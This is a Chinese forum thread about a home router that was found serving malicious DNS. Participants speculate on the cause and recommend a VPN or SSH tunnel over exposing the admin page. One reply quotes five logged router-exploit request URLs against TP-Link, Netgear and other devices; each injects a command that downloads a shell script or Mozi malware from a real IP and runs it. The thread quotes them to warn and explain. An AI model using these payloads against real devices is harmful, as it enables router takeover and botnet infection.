国庆回老家突然发现路由器下发了恶意的 dns

然后呢？

@anson264556364 密码和以前设置的不一样了，等晚上亲戚回去把设备重置下看看，感觉可能是 tp-link 远程管理有漏洞。

tp link 远程管理？你从 wan 口进入？
这是找死，迟早的事

应该 vpn 或者内网穿透，然后 lan 设备去管理它

以前遇到过家里的 padavan 被恶意改了 DNS ，公网进去改的应该是。

我是桥接的！

@shum02 查到原因了吗？弱口令？

从外回家管理路由最佳实践是 vpn ，或者 ssh tunnel ，不要直接暴露管理入口在公网上，路由器这种东西没有及时更新很容易被滥用

服务器经常会收到一些利用漏洞攻击路由器的请求如
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh)

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://49.130.26.13:39255/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

/cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

@ks3825 没，我觉得是弱口令被爆破，padavan 那个认证也没有安全限制的，可以一直爆破

80 端口能通吗?

@titanium98118 不通，老家的网，没弄公网 ip 、没 ipv6 、没桥接。可能的原因是 tp-link 的那个物联 app 管理，或者是装宽带的小哥干的？目前也只有这两种可能性了。

@shum02 是把路由器登陆界面开放给公网了吗？正常是没爆破机会的啊。而且 web 界面暴露出去还有概率被运营商发函警告

@ks3825 嗯，以前是开了的，我这不管的，反正以前的联通和移动公网都是不管开 web 的

@shum02 还是关上吧，太哈人了，padavan 也不算是大型的积极被维护的项目，保不准有什么漏洞，直接向公网开放端口太危险了

似乎某些路由器固件有漏洞
当你访问恶意网站的时候会被上面的脚本发起内网 http 请求修改路由器配置